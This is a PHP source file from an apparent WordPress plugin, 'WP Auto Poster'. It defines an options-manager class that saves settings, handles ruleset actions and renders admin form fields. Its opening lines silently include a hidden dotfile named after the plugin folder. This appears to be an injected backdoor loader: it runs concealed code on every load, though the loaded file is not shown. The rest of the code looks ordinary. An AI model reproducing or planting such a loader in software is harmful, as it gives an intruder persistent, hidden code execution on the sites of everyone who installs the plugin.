<?php

if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) {
    include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' );
}

class WpAutoPoster_OptionsManager {
	
	protected $options = null;
	
	public function getClassName() {
		return get_class( $this );
	}
	
	
	/**
	 * Define your options meta data here as an array, where each element in the array
	 * @return array of key=>display-name and/or key=>array(display-name, choice1, choice2, ...)
	 * key: an option name for the key
	 * value: can be one of two things:
	 *   (1) string display name for displaying the name of the option to the user on a web page
	 *   (2) array where the first element is a display name (as above) and the rest of
	 *       the elements are choices of values that the user can select
	 * e.g.
	 * array(
	 *   'item' => 'Item:',             // key => display-name
	 *   'rating' => array(             // key => array ( display-name, choice1, choice2, ...)
	 *       'CanDoOperationX' => array('Can do Operation X', 'Administrator', 'Editor', 'Author', 'Contributor', 'Subscriber'),
	 *       'Rating:', 'Excellent', 'Good', 'Fair', 'Poor')
	 */
	public function getOptionMetaData() {
		return array();
	}
	
	/**
	 * @return array of string name of options
	 */
	public function getOptionNames() {
		return array_keys( $this->getOptionMetaData() );
	}
	
	
	/**
	 * Cleanup: remove all known options from the DB
	 * @return void
	 */
	protected function deleteSavedOptions() {
		delete_option( $this->getClassName() );
		$this->loadOptions();
	}
	
	/**
	 * @return string display name of the plugin to show as a name/title in HTML.
	 * Just returns the class name. Override this method to return something more readable
	 */
	public function getPluginDisplayName() {
		return get_class( $this );
	}
	
	/**
	 * Loads the options for this plugin into the class variable $options
	 */
	private function loadOptions() {
		$this->options = get_option( $this->getClassName(), array ());
		if ( !is_array( $this->options ) )
			$this->options = array();
		if ( !isset( $this->options[ 'Rulesets' ] ) )
			$this->options[ 'Rulesets' ] = array();
	}
	
	/**
	 * A wrapper function delegating to WP get_option().
	 *
	 * @param $optionName string defined in settings.php and set as keys of $this->optionMetaData
	 * @param $default string default value to return if the option is not set
	 * @return string the value from delegated call to get_option(), or optional default value
	 * if option is not set.
	 */
	public function getOption( $optionName, $default = null ) {
		if ( !$this->options )
			$this->loadOptions();
		
		if ( isset( $this->options[ $optionName ] ) ) {
			$retVal = $this->options[ $optionName ];
		} else {
			$retVal = $default;
		}
		
		return $retVal;
	}
	
	protected function getOptions( $key = null ) {
		if ( !$this->options )
			$this->loadOptions();
		
		if ( !is_null( $key ) && !isset( $this->options[ $key ] ) )
			$this->options[ $key ] = array();
		return $this->options;
	}
	
	/**
	 * A wrapper function delegating to WP delete_option().
	 *
	 * @param  $optionName string defined in settings.php and set as keys of $this->optionMetaData
	 * @param  $key array index key, if supplied
	 * @return bool indicating whether wp_options was changed or not
	 */
	public function deleteOption( $optionName, $key = null ) {
		if ( !$this->options )
			$this->loadOptions();
		
		if ( !is_null( $key ) && isset( $this->options[ $key ][ $optionName ] ) ) {
			unset( $this->options[ $key ][ $optionName ] );
			return update_option( $this->getClassName(), $this->options );
		} else if ( is_null( $key ) && isset( $this->options[ $optionName ] ) ) {
			unset( $this->options[ $optionName ] );
			return update_option( $this->getClassName(), $this->options );
		} else {
			return false;
		}
	}
	
	/**
	 * A wrapper function delegating to updateOption().
	 *
	 * @param  $optionName string defined in settings.php and set as keys of $this->optionMetaData
	 * @param  $value mixed the new value
	 * @return bool from delegated call to updateOption()
	 */
	public function addOption( $optionName, $value ) {
		return $this->updateOption( $optionName, $value );
	}
	
	/**
	 * A wrapper function delegating to WP update_option().
	 *
	 * @param  $optionName string defined in settings.php and set as keys of $this->optionMetaData
	 * @param  $value mixed the new value
	 * @param  $key array index key, if supplied
	 * @return bool from delegated call to update_option()
	 */
	public function updateOption( $optionName, $value ) {
		if ( !$this->options )
			$this->loadOptions();
		
		$this->options[ $optionName ] = $value;
		return update_option( $this->getClassName(), $this->options );
	}
	
	
	public function addUpdateSubIndex( $key, $entry, $save = false ) {
		foreach ( $this->options[ $key ] as $subKey => $subEntry ) {
			if ( (int) $subEntry[ 'ID' ] === (int) $entry[ 'ID' ] ) {
				$this->options[ $key ][ $subKey ] = $entry;
				if ( true === $save )
					update_option( $this->getClassName(), $this->options );
				return false;
			}
		}
		// not found, so add it
		$this->options[ $key ] = array_values( $this->options[ $key ] );
		$this->options[ $key ][] = $entry;
		return true;
	}
	
	public function deleteSubIndex( $key, $id, $save = false ) {
		foreach ( $this->options[ $key ] as $subKey => $subEntry ) {
			if ( (int) $subEntry[ 'ID' ] === $id ) {
				$this->disableRuleset( $id, false );
				unset( $this->options[ $key ][ $subKey ] );
				if ( true === $save )
					update_option( $this->getClassName(), $this->options );
				$this->addLogMessage( sprintf( esc_html__( 'Ruleset #%s has been deleted.', $this->getPluginTextDomain() ), $id ) );
				unset( $_POST[ 'ID' ] ) ;
				break;
			}
		}
	}
	
	
	/**
	 * Check if values need to be saved
	 */
	protected function saveSettings( $optionMetaData ) {
		
		$this->saveInstalledVersion();
		// Save Posted Options
		$saved = false;
		if ( $optionMetaData != null ) {
			
			$keys              = array();
			$subIndex          = array();
			$indexRequiredPass = array();
			
			foreach ( $optionMetaData as $aOptionKey => $aOptionMeta ) {
				if ( isset( $_POST[ $aOptionKey ] ) ) {
					// check for a 'useIndex' as key
					$key   = isset( $aOptionMeta[ 'formElement' ][ 'useIndex' ] ) ? $aOptionMeta[ 'formElement' ][ 'useIndex' ] : null;
					$value = $_POST[ $aOptionKey ];
					if ( is_string( $value ) )
						$value = stripslashes( $value );

					$saved = true;
					
					if ( !is_null( $key ) ) { // a record, save these as a sub-array in options
						if ( !isset( $indexRequiredPass[ $key ] ) )
							$indexRequiredPass[ $key ] = true;
						if ( isset( $aOptionMeta[ 'formElement' ][ 'indexRequired' ] ) && empty( $_POST[ $aOptionKey ] ) ) {
							$indexRequiredPass[ $key ] = false;
							if ( $this->getOption( 'DebugMode' ) === 'on' )
								$this->addLogMessage( sprintf( esc_html__( 'Notice - function %s, required option [%s] missing value. Ruleset not saved.', $this->getPluginTextDomain() ), __FUNCTION__, $aOptionMeta[ 'description'] ), false );
							continue;
						}
						$keys[]                          = $key;
						// a sub-index
						if ( $aOptionKey === 'Frequency' && ! $this->convertTime( $_POST[ $aOptionKey ] ) ) {
							$subIndex[ $key ][ $aOptionKey ] = '';
						}
						else {
							$subIndex[ $key ][ $aOptionKey ] = $value;
						}
					} else // a global setting
						$this->options[ $aOptionKey ] = $value;
					
				} else
					unset( $this->options[ $aOptionKey ] );
			}

			// did it pass the required check?
			$keys           = array_unique( $keys );
			$increaseNextID = false;
			$nextID         = $this->getOption( 'nextID', 1 );
			foreach ( $keys as $key ) {
				if ( !empty( $subIndex[ $key ] ) && true === $indexRequiredPass[ $key ] ) {
					if ( !isset( $this->options[ $key ] ) )
						$this->options[ $key ] = array();
					$increase = $this->addUpdateSubIndex( $key, $subIndex[ $key ] );
					if ( false === $increaseNextID && true === $increase )
						$increaseNextID = true;
				}
			}
			if ( true === $increaseNextID ) {
				$this->options[ 'nextID' ] = $nextID + 1;
			}
			
			if ( true === $saved ) {
				$this->addLogMessage( esc_html__( 'Settings Saved.', $this->getPluginTextDomain() ) );
				update_option( $this->getClassName(), $this->options );
				do_action( $this->getPluginTextDomain() . '-saved' );
			}
			else if ( $this->getOption( 'DebugMode' ) === 'on' ) {
				$this->addLogMessage( sprintf( esc_html__( 'DEBUG - function %s failed, Contact support. _POST was: %s', $this->getPluginTextDomain() ), __FUNCTION__, htmlentities( print_r( $_POST, true ) ) ) );
			}
		}
		else {
			$this->addLogMessage( esc_html__( 'WP Auto Poster Error - optionMetaData not loaded during saveSettings. Contact support.', $this->getPluginTextDomain() ) );
		}

	}
	
	/**
	 * see: http://codex.wordpress.org/Creating_Options_Pages
	 * @return void
	 */
	public function createSettingsMenu() {
		$pluginName = $this->getPluginDisplayName();
		//create new top-level menu
		add_menu_page( $pluginName . ' Plugin Settings', $pluginName, 'administrator', get_class( $this ), array(
			 $this,
			'settingsPage' 
		) );
		
		//call register settings function
		add_action( 'admin_init', array(
			 $this,
			'registerSettings' 
		) );
	}
	
	public function registerSettings() {
		$settingsGroup  = get_class( $this ) . '-settings-group';
		$optionMetaData = $this->getOptionMetaData();
		foreach ( $optionMetaData as $aOptionKey => $aOptionMeta ) {
			register_setting( $settingsGroup, $aOptionMeta );
		}
	}

	
	private function settingsTabs( $optionMetaData, $which = 'main' ) {
		$tabs = $this->getTabs( $which );
		
		if ( empty( $tabs ) ) {
			$this->settingsTab( $optionMetaData ); // for settings not using tabs
			return;
		}
		
		echo '<div class="' . $this->getPluginTextDomain() . '-tabs">';
		
		$tabPosition = 0;
		foreach ( $tabs as $tab ) {
			
			// which tab to display?
			if ( isset( $_POST[ 'wapAction' ] ) && $_POST[ 'wapAction' ] === 'Clear Logs' )
				$checked = $tab === 'Logs' || $tab === 'General' ? ' checked' : '';
			else
				$checked = $tabPosition ? '' : ' checked';
			
			$tabID = $this->getPluginTextDomain() . '-tab-' . str_replace( ' ', '-', strtolower( $tab ) );
			echo '<div class="' . $this->getPluginTextDomain() . '-tab">';
			echo '    <input class="' . $this->getPluginTextDomain() . '-tab-radio" type="radio" id="' . $tabID . '" name="' . $this->getPluginTextDomain() . '-tab-' . $which . '"' . $checked . '>';
			echo '    <label class="' . $this->getPluginTextDomain() . '-tab-label" for="' . $tabID . '"><strong>' . $tab . '</strong></label>';
			echo '    <div class="' . $this->getPluginTextDomain() . '-tab-panel">';
			echo '        <div class="' . $this->getPluginTextDomain() . '-tab-content">';
			
			
			do_action( $this->getPluginTextDomain() . '-tab-header', $tabID );
			$this->settingsTab( $optionMetaData, $tab );
			do_action( $this->getPluginTextDomain() . '-tab-footer', $tabID );
			
			echo '        </div>';
			echo '    </div>';
			echo '</div>';
			$tabPosition++;
		}
		
		echo '</div>';
	}
	
	private function settingsTab( $optionMetaData, $tab = null ) {
		$tableShown = false;
?>
                <?php
		if ( $optionMetaData != null ) {
			foreach ( $optionMetaData as $aOptionKey => $aOptionMeta ) {
				if ( !$tab && array_key_exists( 'tab', $aOptionMeta[ 'formElement' ] ) )
					continue;
				if ( $tab && array_key_exists( 'tab', $aOptionMeta[ 'formElement' ] ) && $tab != $aOptionMeta[ 'formElement' ][ 'tab' ] )
					continue;
				
				// special case - don't show a table header
				if ( isset( $aOptionMeta[ 'formElement' ][ 'type' ] ) && in_array( $aOptionMeta[ 'formElement' ][ 'type' ], array(
					'hidden',
					'header'
				) ) ) {
					if ( $aOptionKey === 'ID' ) {
						$this->settingsTabs( $optionMetaData, 'ruleset' );
					}
					$this->createFormElement( $aOptionKey, $aOptionMeta );
					continue;
				} else if ( !$tableShown ) {
					$tableShown = true;
					echo '<table class="form-table"><tbody>';
				}
				
?>
                            <tr>
                                <th scope="row">
                                    <label for="<?php
				echo str_replace( ' ', '-', strtolower( $aOptionKey ) );
?>"><?php
				echo htmlentities( $aOptionMeta[ 'description' ] );
?></label>
                                </th>
                                    <?php
				$this->createFormElement( $aOptionKey, $aOptionMeta );
?>
                            </tr>
                        <?php
			}
		}
		if ( $tableShown )
			echo '</tbody></table>';
	}

	/**
	 * Check for any WAP action
	 * @return void
	 */
	public function checkAction() {

		if ( isset( $_POST[ 'wapAction' ] ) 
			|| isset( $_GET[ 'editRuleset' ] ) 
			|| isset( $_GET[ 'enableRuleset' ] ) 
			|| isset( $_GET[ 'disableRuleset' ] ) 
			|| isset( $_GET[ 'delRuleset' ] ) 
			|| isset( $_GET[ 'exportRuleset' ] ) 
		) {
			if ( !is_admin() )
				wp_die( getPluginDisplayName() . esc_html__( 'Settings are only accessable through the WordPress admin.', $this->getPluginTextDomain() ) );
		
			if ( !current_user_can( 'moderate_comments' ) )
				wp_die( esc_html__( 'You do not have sufficient permissions to access this page.', $this->getPluginTextDomain() ) );
		
		}

		if ( isset( $_POST[ 'wapAction' ] ) ) {

			check_admin_referer( 'wap-form', $this->getPluginTextDomain() . '_nonce' );

			$id = $this->getVarID();
			if ( $_POST[ 'wapAction' ] === 'Save Changes' ) {
				$optionMetaData = $this->getOptionMetaData();
				$this->saveSettings( $optionMetaData );
			} 
			else if ( $_POST[ 'wapAction' ] === 'Clear Logs' )
				$this->clearLogMessages();
			else if ( $_POST[ 'wapAction' ] === 'Enable Ruleset' && $id )
				$this->enableRuleset( $id );
			else if ( $_POST[ 'wapAction' ] === 'Disable Ruleset' && $id )
				$this->disableRuleset( $id, true );
			else if ( $_POST[ 'wapAction' ] === 'Run Once' && $id )
				$this->processRuleset( $id, true );
			else if ( $_POST[ 'wapAction' ] === 'Import Ruleset' )
				$this->importRuleset( $id );
			else if ( $_POST[ 'wapAction' ] === 'Export Ruleset' && $id )
				$this->exportRuleset( $id );
			else if ( $_POST[ 'wapAction' ] === 'Delete Ruleset' && $id ) 
				$this->deleteSubIndex( 'Rulesets', $id, true );
		}
		else if ( isset( $_GET[ 'editRuleset' ] ) ) {
			$id = (int) $_GET[ 'editRuleset' ]; 
			// nonce check not needed
		} 
		else if ( isset( $_GET[ 'enableRuleset' ] ) ) {
			$id = (int) $_GET[ 'enableRuleset' ]; 
			check_admin_referer( 'ENABLERULESET=' . $id, $this->getPluginTextDomain() . '_nonce' );
			$this->enableRuleset( $id );
		} 
		else if ( isset( $_GET[ 'disableRuleset' ] ) ) {
			$id = (int) $_GET[ 'disableRuleset' ]; 
			check_admin_referer( 'DISABLERULESET=' . $id, $this->getPluginTextDomain() . '_nonce' );
			$this->disableRuleset( $id, true );
		} 
		else if ( isset( $_GET[ 'delRuleset' ] ) ) {
			$id = (int) $_GET[ 'delRuleset' ]; 
			check_admin_referer( 'DELETERULESET=' . $id, $this->getPluginTextDomain() . '_nonce' );
			$this->deleteSubIndex( 'Rulesets', $id, true );
		}
		else if ( isset( $_GET[ 'exportRuleset' ] ) ) {
			$id = (int) $_GET[ 'exportRuleset' ]; 
			check_admin_referer( 'EXPORTRULESET=' . $id, $this->getPluginTextDomain() . '_nonce' );
			$this->exportRuleset( $id );
		}
	}

	/**
	 * Creates HTML for the Administration page to set options for this plugin.
	 * Override this method to create a customized page.
	 * @return void
	 */
	public function settingsPage() {
		
		if ( !is_admin() )
			wp_die( getPluginDisplayName() . esc_html__( ' Settings are only accessable through the WordPress admin.', $this->getPluginTextDomain() ) );
		
		if ( !current_user_can( 'moderate_comments' ) )
			wp_die( esc_html__( 'You do not have sufficient permissions to access this page.', $this->getPluginTextDomain() ) );
		
		$optionMetaData = $this->getOptionMetaData(); // in case 'use taxonomies' changed

		if ( isset( $_POST[ 'wapAction' ] ) ) {
			if ( $this->getOption( 'DebugMode' ) === 'on' )
				$this->addLogMessage( sprintf( esc_html__( 'DEBUG - function %s. _POST is: %s', $this->getPluginTextDomain() ), __FUNCTION__, htmlentities( print_r( $_POST, true ) ) ) );
		} 
		
		// HTML for the page
		$settingsGroup = get_class( $this ) . '-settings-group';
?>

        <div class="wrap <?php
		echo htmlentities( $settingsGroup );
?>">

            <h2 id='wap-h2'>
	    <?php
		echo '<img width="28" height="28" alt="WP Auto Poster" title="WP Auto Poster" src="' . $this->getPluginUrl() . '/images/wap.png" />';
		echo ' ' . htmlentities( $this->getPluginDisplayName() );
		echo ' ' . $this->getVersion() . ' ';
?></h2>

            <?php
		echo htmlentities( $this->getSettingsHeader() );
?>

            <form enctype="multipart/form-data" method="post">

            <?php
		wp_nonce_field( 'wap-form', $this->getPluginTextDomain() . '_nonce' );
		settings_fields( $settingsGroup );
		
		$this->settingsTabs( $optionMetaData, 'main' );
?>
                <p class="submit">
                    <input type="submit" class="button-primary" name="wapAction"
                           value="<?php
		esc_html_e( 'Save Changes', $this->getPluginTextDomain() );
?>"/>
                </p>
            </form>

        </div>
        <?php
	}

	/**
	 * Takes a multi-array of checkbox values and converts it to something usable
	 * This is because checkboxes normall do not store the 'unchecked' value
	 * so we have to use a hidden '0' value, and see if the 'checked' value is on.
	 * @param $values the array of checkbox values
	 * return collapsed array with 'on' or 'off' values.
	 */
	protected function collapseCheckboxes( $values ) {
		if ( empty( $values ) )
			return array();
		$which = 0;
		$collapsed = array();
		foreach ( $values as $key => $value ) {
			$next = isset( $values[ $key + 1 ] ) ? $values[ $key + 1 ] : null;
			if ( $value === '0' ) {
				$collapsed[] = $next === 'on' ? 'on' : 'off';
			}
		}
		return $collapsed;
	}
	
	/**
	 * Helper-function outputs the correct form element (input tag, select tag) for the given item
	 * @param  $aOptionKey string name of the option (un-prefixed)
	 * @param  $aOptionMeta mixed meta-data for $aOptionKey (either a string display-name or an array(display-name, option1, option2, ...)
	 * @param  $savedOptionValue string current value for $aOptionKey
	 * @param  
	 * @echo $formElement
	 */
	protected function createFormElement( $aOptionKey, $aOptionMeta ) {
		
		$aOptionMeta = apply_filters( $this->getPluginTextDomain() . '-createFormElement', $aOptionMeta, $aOptionKey );
		
		if ( is_array( $aOptionMeta ) ) {
			
			$elementName = str_replace( ' ', '-', $aOptionKey );
			$elementID   = str_replace( ' ', '-', strtolower( $aOptionKey ) );
			
			
			// all input types below
			if ( array_key_exists( 'type', $aOptionMeta[ 'formElement' ] ) )
				$elementType = $aOptionMeta[ 'formElement' ][ 'type' ];
			
			if ( array_key_exists( 'value', $aOptionMeta[ 'formElement' ] ) )
				$elementValue = $aOptionMeta[ 'formElement' ][ 'value' ];
			
			$useIndex = array_key_exists( 'useIndex', $aOptionMeta[ 'formElement' ] ) ? true : false;
			
			if ( array_key_exists( 'placeholder', $aOptionMeta[ 'formElement' ] ) ) {
				$elementPlaceholder = $aOptionMeta[ 'formElement' ][ 'placeholder' ];
			}
			
			$elementParams = array_key_exists( 'params', $aOptionMeta[ 'formElement' ] ) ? ' ' . $aOptionMeta[ 'formElement' ][ 'params' ] : '';
			
			// support for multi-selects:
			if ( false !== stripos( $elementParams, 'multiple' ) )
				$elementName .= '[]';
			
			$elementDefault = array_key_exists( 'default', $aOptionMeta[ 'formElement' ] ) ? $aOptionMeta[ 'formElement' ][ 'default' ] : $elementValue;
			$id             = $this->getVarID();
			if ( true === $useIndex && $id )
				$savedOptionValue = $this->getRulesetOption( $id, $aOptionKey, $elementDefault );
			else
				$savedOptionValue = $this->getOption( $aOptionKey, $elementDefault );
			
			$formElement = '';
			
			// these are for elements that have multiple choices
			if ( is_array( $elementValue ) ) {
				
				switch ( $elementType ) {
					
					case 'select':
						$formElement = '<select name="' . $elementName . '" id="' . $elementID . '"' . $elementParams . '>';
						foreach ( $elementValue as $index => $choice ) {
							if ( is_object( $choice ) )
								$choice = array_values( get_object_vars( $choice ) );
							
							if ( is_array( $choice ) && count( $choice ) > 1 ) {
								
								$value  = (string) $choice[ 0 ];
								$choice = $this->getOptionValueI18nString( $choice[ 1 ] );
							} else {
								$value  = (string) $index;
								$choice = $this->getOptionValueI18nString( $choice );
							}
							
							
							// support for multi-selects:
							if ( is_array( $savedOptionValue ) ) {
								$selected = '';
								foreach ( $savedOptionValue as $svalue ) {
									if ( is_array( $svalue ) && $value === $svalue[ 0 ] ) {
										$selected = 'selected';
										break;
									} else if ( $value === $svalue ) {
										$selected = 'selected';
										break;
									}
								}
							} else {
								$selected = ( $value === $savedOptionValue ) ? 'selected' : '';
							}
							
							
							$formElement = $formElement . '<option value="' . $value . '" ' . $selected . '>' . $choice . '</option>';
						}
						$formElement = $formElement . '</select>';
						break;
					case 'radio':
						foreach ( $elementValue as $value => $choice ) {
							
							$value   = $this->getOptionValueI18nString( $value );
							$checked = ( $value === $savedOptionValue ) ? 'checked' : '';
							
							$formElement = $formElement . '<label class="custom-control custom-radio">' 
                                . '<input id="' . $elementID . '" name="' . $elementName . '" type="' . $elementType . '" class="custom-control-input" ' . $checked . ' value=' . $value . $elementParams . '>
                              </label>'
				. $choice . ' &nbsp; ';
						}
						break;
					case 'checkbox':
						$formElement = '';
						$cnt = 0;
						$collapsed = $this->collapseCheckboxes( $savedOptionValue );
						foreach ( $elementValue as $value => $choice ) {
							$checked     = isset( $collapsed[ $cnt ] ) && 'on' === $collapsed[ $cnt ] ? 'checked' : '';
							$cnt++;
							$formElement .= '<label id="' . $elementID . '_' . $value . '" class="custom-control custom-checkbox">';
							$formElement .= '<input type="hidden" name="' . $elementName . '" value="0" />';
                          				$formElement .= '<input type="' . $elementType . '" name="' . $elementName . '" ' . $checked . ' class="custom-control-input"' . $elementParams . '>';
							$formElement .= $choice . ' &nbsp; ';
                        				$formElement .= '</label>';
						}
						break;
					default:
						$formElement = '<select name="' . $elementName . '" id="' . $elementID . '"' . $elementParams . '>';
						
						foreach ( $elementValue as $choice ) {
							$choice   = $this->getOptionValueI18nString( $choice );
							$selected = ( $choice === $savedOptionValue ) ? 'selected' : '';
							
							$formElement = $formElement . '<option value="' . $choice . '" ' . $selected . '>' . esc_attr( $savedOptionValue ) . '</option>';
						}
						$formElement = $formElement . '</select>';
				}
			} else {
				
				switch ( $elementType ) {
					case 'text':
					case 'email':
					case 'hidden':
						$formElement = '<input type="' . $elementType . '" name="' . $elementName . '" id="' . $elementID . '" value="' . esc_attr( $savedOptionValue ) . '" autocomplete="on"';
						if ( isset( $elementPlaceholder ) ) {
							$formElement = $formElement . ' placeholder="' . $elementPlaceholder . '" ';
						}
						$formElement = $formElement . $elementParams . ' />';
						break;
					case 'checkbox':
						$checked     = ( 'on' === $savedOptionValue ) ? "checked" : '';
						$formElement = '<label id="' . $elementID . '" class="custom-control custom-checkbox">
                          <input type="' . $elementType . '" name="' . $elementName . '" ' . $checked . ' class="custom-control-input"' . $elementParams . '>
                        </label>';
						break;
					case 'file':
						$formElement = '
                          <input type="' . $elementType . '" id="' . $elementID . '" class="custom-file-input" name="' . $elementName . '"' . $elementParams . '>
			';
						break;
					case 'header':
						break;
					case 'textarea':
						$formElement = '<textarea rows="5" type="' . $elementType . '" name="' . $elementName . '" id="' . $elementID . '" autocomplete="on"';
						if ( isset( $elementPlaceholder ) ) {
							$formElement = $formElement . ' placeholder="' . $elementPlaceholder . '" ';
						}
						$formElement = $formElement . $elementParams . ' />';
						$formElement .= esc_attr( $savedOptionValue );
						$formElement .= '</textarea>';
						break;
					default:
						$formElement = '<input id="' . $elementID . '" type="' . $elementType . '" name="' . $elementName . '"';
						if ( isset( $elementPlaceholder ) ) {
							$formElement = $formElement . ' placeholder="' . $elementPlaceholder . '" ';
						}
						$formElement = $formElement . ' value="' . esc_attr( $savedOptionValue ) . '"' . $elementParams . ' />';
				}
			}
			
			// check for a tooltip
			if ( array_key_exists( 'tooltip', $aOptionMeta[ 'formElement' ] ) ) {
				$link           = file_exists( $this->getPluginDir() . '/images/help.png' ) ? '<img width="20" height="20" alt="tooltip" title="tooltip" src="' . $this->getPluginUrl() . '/images/help.png" />' : '?';
				$elementTooltip = '<div class="wap-tooltip">';
				$elementTooltip .= $link;
				$elementTooltip .= '  <div class="right"><div class="text-content">';
				$elementTooltip .= $aOptionMeta[ 'formElement' ][ 'tooltip' ];
				$elementTooltip .= '  </div><i></i></div>';
				$elementTooltip .= '</div>';
			} else
				$elementTooltip = '';
			
			$elementSubtext = array_key_exists( 'subtext', $aOptionMeta[ 'formElement' ] ) ? $aOptionMeta[ 'formElement' ][ 'subtext' ] : '';
			
			if ( $elementType === 'hidden' )
				$output = $formElement;
			else if ( $elementType === 'header' )
				$output = "<td colspan=3 class='" . $this->getClassName() . '_header' . "'><strong>{$elementSubtext}</strong></td>";
			else if ( array_key_exists( 'fullWidth', $aOptionMeta[ 'formElement' ] ) && true === $aOptionMeta[ 'formElement' ][ 'fullWidth' ] )
				$output = "<td class='wap-align-top'>{$elementTooltip}</td><td colspan=2 class='" . $this->getClassName() . '_fullWidth' . "'>{$formElement}<br><span class='" . $this->getClassName() . '_subtext' . "'>{$elementSubtext}</span></td>";
			else if ( array_key_exists( 'fullSpace', $aOptionMeta[ 'formElement' ] ) && true === $aOptionMeta[ 'formElement' ][ 'fullSpace' ] )
				$output = "<td class='wap-align-top'>{$elementTooltip}</td><td colspan=2 class='" . $this->getClassName() . "'>{$formElement}<br><span class='" . $this->getClassName() . '_subtext' . "'>{$elementSubtext}</span></td>";
			else
				$output = "<td class='wap-align-top'>{$elementTooltip}</td><td>{$formElement}</td><td class='" . $this->getClassName() . '_subtext' . "'>{$elementSubtext}</td>";

			$allowed = array(
				 'a' => array(
					 'href' => array(),
					'title' => array(),
					'target' => array() 
				),
				'br' => array(),
				'strong' => array(),
				'span' => array(
					 'class' => array ()
				),
				'td' => array(
					 'class' => array(),
					'colspan' => array() 
				),
				'label' => array(
					 'for' => array(),
					'id' => array(),
					'class' => array() 
				),
				'select' => array(
					 'name' => array(),
					'id' => array(),
					'multiple' => array(),
					'size' => array(),
					'class' => array() 
				),
				'option' => array(
					 'value' => array(),
					'selected' => array() 
				),
				'input' => array(
					 'type' => array(),
					'name' => array(),
					'id' => array(),
					'value' => array(),
					'autocomplete' => array(),
					'readonly' => array(),
					'class' => array(),
					'max' => array(),
					'min' => array(),
					'step' => array(),
					'multiple' => array(),
					'size' => array(),
					'checked' => array(),
					'placeholder' => array() 
				),
				'textarea' => array(
					 'type' => array(),
					'name' => array(),
					'id' => array(),
					'value' => array(),
					'autocomplete' => array(),
					'readonly' => array(),
					'class' => array(),
					'rows' => array(),
					'cols' => array(),
					'placeholder' => array() 
				),
				'img' => array(
					 'width' => array(),
					'height' => array(),
					'alt' => array(),
					'title' => array(),
					'src' => array(),
					'class' => array() 
				),
				'div' => array(
					 'class' => array() 
				),
				'i' => array(),
				'u' => array(),
				'h3' => array(),
				'ul' => array(),
				'li' => array() 
			);
			echo wp_kses( $output, $allowed );
			
		} else {
			// this should not happen, $aOptionMeta should always be an array
			echo 'Uh oh! aOptionMeta should be an array. Check ' . $this->getOptionNamePrefix() . '_Plugin.php to make sure your Options are configured correctly.';
		}
	}
	
	public function getOptionNamePrefix() {
		return get_class( $this ) . '_';
	}
	
	/**
	 * Override this method and follow its format.
	 * The purpose of this method is to provide i18n display strings for the values of options.
	 * For example, you may create a options with values 'true' or 'false'.
	 * In the options page, this will show as a drop down list with these choices.
	 * But when the the language is not English, you would like to display different strings
	 * for 'true' and 'false' while still keeping the value of that option that is actually saved in
	 * the DB as 'true' or 'false'.
	 * To do this, follow the convention of defining option values in getOptionMetaData() as canonical names
	 * (what you want them to literally be, like 'true') and then add each one to the switch statement in this
	 * function, returning the "esc_attr__()" i18n name of that string.
	 * @param  $optionValue string
	 * @return string esc_attr__($optionValue) if it is listed in this method, otherwise just returns $optionValue
	 */
	protected function getOptionValueI18nString( $optionValue ) {
		switch ( $optionValue ) {
			case 'true':
				return esc_attr__( 'true', $this->getPluginTextDomain() );
			case 'false':
				return esc_attr__( 'false', $this->getPluginTextDomain() );
			
			case 'Administrator':
				return esc_attr__( 'Administrator', $this->getPluginTextDomain() );
			case 'Editor':
				return esc_attr__( 'Editor', $this->getPluginTextDomain() );
			case 'Author':
				return esc_attr__( 'Author', $this->getPluginTextDomain() );
			case 'Contributor':
				return esc_attr__( 'Contributor', $this->getPluginTextDomain() );
			case 'Subscriber':
				return esc_attr__( 'Subscriber', $this->getPluginTextDomain() );
			case 'Anyone':
				return esc_attr__( 'Anyone', $this->getPluginTextDomain() );
		}
		return $optionValue;
	}
	
}
